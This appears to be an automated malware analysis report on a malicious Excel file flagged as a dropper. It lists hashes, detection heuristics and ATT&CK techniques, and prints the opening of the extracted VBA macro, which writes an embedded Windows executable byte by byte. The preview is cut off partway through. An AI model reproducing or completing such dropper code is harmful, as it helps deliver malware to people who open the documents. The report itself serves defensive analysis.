Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aafcbdc5174c50ac…

MALICIOUS

Office (OLE)

119.0 KB Created: 2005-05-02 10:15:57 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 38acb3540e110ad170e7721de25ca1b3 SHA-1: a6cec3dc5b65cbe593455f569965327227394752 SHA-256: aafcbdc5174c50acb75763363b1b63807022f4138cf09efb85596b0bb5201b99
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File

The file is an Excel document containing a malicious VBA macro with an Auto_Open subroutine. This macro utilizes the Shell() function to execute cmd.exe, indicating it's designed to run a secondary payload. The heuristic firings and the presence of a large VBA macro strongly suggest a dropper or downloader functionality, consistent with the ClamAV detection of 'Doc.Dropper.Agent-7623001-0'.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-7623001-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7623001-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 48294 bytes
SHA-256: 9cd923c5522f598e0777a8589f5b1edc406b3b955aa576a757bc05765a9bb80a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Modul1"
Dim x(3104) As Byte

Sub InitExe1()
x(0) = &H4D
x(1) = &H5A
x(2) = &H90
x(3) = &H0
x(4) = &H3
x(5) = &H0
x(6) = &H0
x(7) = &H0
x(8) = &H4
x(9) = &H0
x(10) = &H0
x(11) = &H0
x(12) = &HFF
x(13) = &HFF
x(14) = &H0
x(15) = &H0
x(16) = &HB8
x(17) = &H0
x(18) = &H0
x(19) = &H0
x(20) = &H0
x(21) = &H0
x(22) = &H0
x(23) = &H0
x(24) = &H40
x(25) = &H0
x(26) = &H0
x(27) = &H0
x(28) = &H0
x(29) = &H0
x(30) = &H0
x(31) = &H0
x(32) = &H0
x(33) = &H0
x(34) = &H0
x(35) = &H0
x(36) = &H0
x(37) = &H0
x(38) = &H0
x(39) = &H0
x(40) = &H0
x(41) = &H0
x(42) = &H0
x(43) = &H0
x(44) = &H0
x(45) = &H0
x(46) = &H0
x(47) = &H0
x(48) = &H0
x(49) = &H0
x(50) = &H0
x(51) = &H0
x(52) = &H0
x(53) = &H0
x(54) = &H0
x(55) = &H0
x(56) = &H0
x(57) = &H0
x(58) = &H0
x(59) = &H0
x(60) = &H80
x(61) = &H0
x(62) = &H0
x(63) = &H0
x(64) = &HE
x(65) = &H1F
x(66) = &HBA
x(67) = &HE
x(68) = &H0
x(69) = &HB4
x(70) = &H9
x(71) = &HCD
x(72) = &H21
x(73) = &HB8
x(74) = &H1
x(75) = &H4C
x(76) = &HCD
x(77) = &H21
x(78) = &H54
x(79) = &H68
x(80) = &H69
x(81) = &H73
x(82) = &H20
x(83) = &H70
x(84) = &H72
x(85) = &H6F
x(86) = &H67
x(87) = &H72
x(88) = &H61
x(89) = &H6D
x(90) = &H20
x(91) = &H63
x(92) = &H61
x(93) = &H6E
x(94) = &H6E
x(95) = &H6F
x(96) = &H74
x(97) = &H20
x(98) = &H62
x(99) = &H65
x(100) = &H20
x(101) = &H72
x(102) = &H75
x(103) = &H6E
x(104) = &H20
x(105) = &H69
x(106) = &H6E
x(107) = &H20
x(108) = &H44
x(109) = &H4F
x(110) = &H53
x(111) = &H20
x(112) = &H6D
x(113) = &H6F
x(114) = &H64
x(115) = &H65
x(116) = &H2E
x(117) = &HD
x(118) = &HD
x(119) = &HA
x(120) = &H24
x(121) = &H0
x(122) = &H0
x(123) = &H0
x(124) = &H0
x(125) = &H0
x(126) = &H0
x(127) = &H0
x(128) = &H50
x(129) = &H45
x(130) = &H0
x(131) = &H0
x(132) = &H4C
x(133) = &H1
x(134) = &H3
x(135) = &H0
x(136) = &HB4
x(137) = &H83
x(138) = &H57
x(139) = &H42
x(140) = &H0
x(141) = &H0
x(142) = &H0
x(143) = &H0
x(144) = &H0
x(145) = &H0
x(146) = &H0
x(147) = &H0
x(148) = &HE0
x(149) = &H0
x(150) = &HE
x(151) = &H1
x(152) = &HB
x(153) = &H1
x(154) = &H2
x(155) = &H37
x(156) = &H0
x(157) = &H4
x(158) = &H0
x(159) = &H0
x(160) = &H0
x(161) = &H4
x(162) = &H0
x(163) = &H0
x(164) = &H0
x(165) = &H0
x(166) = &H0
x(167) = &H0
x(168) = &H19
x(169) = &H12
x(170) = &H0
x(171) = &H0
x(172) = &H0
x(173) = &H10
x(174) = &H0
x(175) = &H0
x(176) = &H0
x(177) = &H20
x(178) = &H0
x(179) = &H0
x(180) = &H0
x(181) = &H0
x(182) = &H40
x(183) = &H0
x(184) = &H0
x(185) = &H10
x(186) = &H0
x(187) = &H0
x(188) = &H0
x(189) = &H2
x(190) = &H0
x(191) = &H0
x(192) = &H1
x(193) = &H0
x(194) = &H0
x(195) = &H0
x(196) = &H0
x(197) = &H0
x(198) = &H0
x(199) = &H0
x(200) = &H4
x(201) = &H0
x(202) = &H0
x(203) = &H0
x(204) = &H0
x(205) = &H0
x(206) = &H0
x(207) = &H0
x(208) = &H0
x(209) = &H40
x(210) = &H0
x(211) = &H0
x(212) = &H0
x(213) = &H4
x(214) = &H0
x(215) = &H0
x(216) = &H0
x(217) = &H0
x(218) = &H0
x(219) = &H0
x(220) = &H3
x(221) = &H0
x(222) = &H0
x(223) = &H0
x(224) = &H0
x(225) = &H0
x(226) = &H10
x(227) = &H0
x(228) = &H0
x(229) = &H10
x(230) = &H0
x(231) = &H0
x(232) = &H0
x(233) = &H0
x(234) = &H10
x(235) = &H0
x(236) = &H0
x(237) = &H10
x(238) = &H0
x(239) = &H0
x(240) = &H0
x(241) = &H0
x(242) = &H0
x(243) = &H0
x(244) = &H10
x(245) = &H0
x(246) = &H0
x(247) = &H0
x(248) = &H0
x(249) = &H0
x(250) = &H0
x(251) = &H0
x(252) = &H0
x(253) = &H0
x(254) = &H0
x(255) = &H0
x(256) = &H0
x(257) = &H30
x(258) = &H0
x(259) = &H0
x(260) = &H3C
x(261) = &H1
x(262) = &H0
x(263) = &H0
x(264) = &H0
x(265) = &H0
x(266) = &H0
x(267) = &H0
x(268) = &H0
x(269) = &H0
x(270) = &H0
x(271) = &H0
x(272) = &H0
x(273) = &H0
x(274) = &H0
x(275) = &H0
x(276) = &H0
x(277) = &H0
x(278) = &H0
x(279) = &H0
x(280) = &H0
x(281) = &H0
x(282) = &H0
x(283) = &H0
x(284) = &H0
x(285) = &H0
x(286) = &H0
x(287) = &H0
x(288) = &H0
x(289) = &H
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.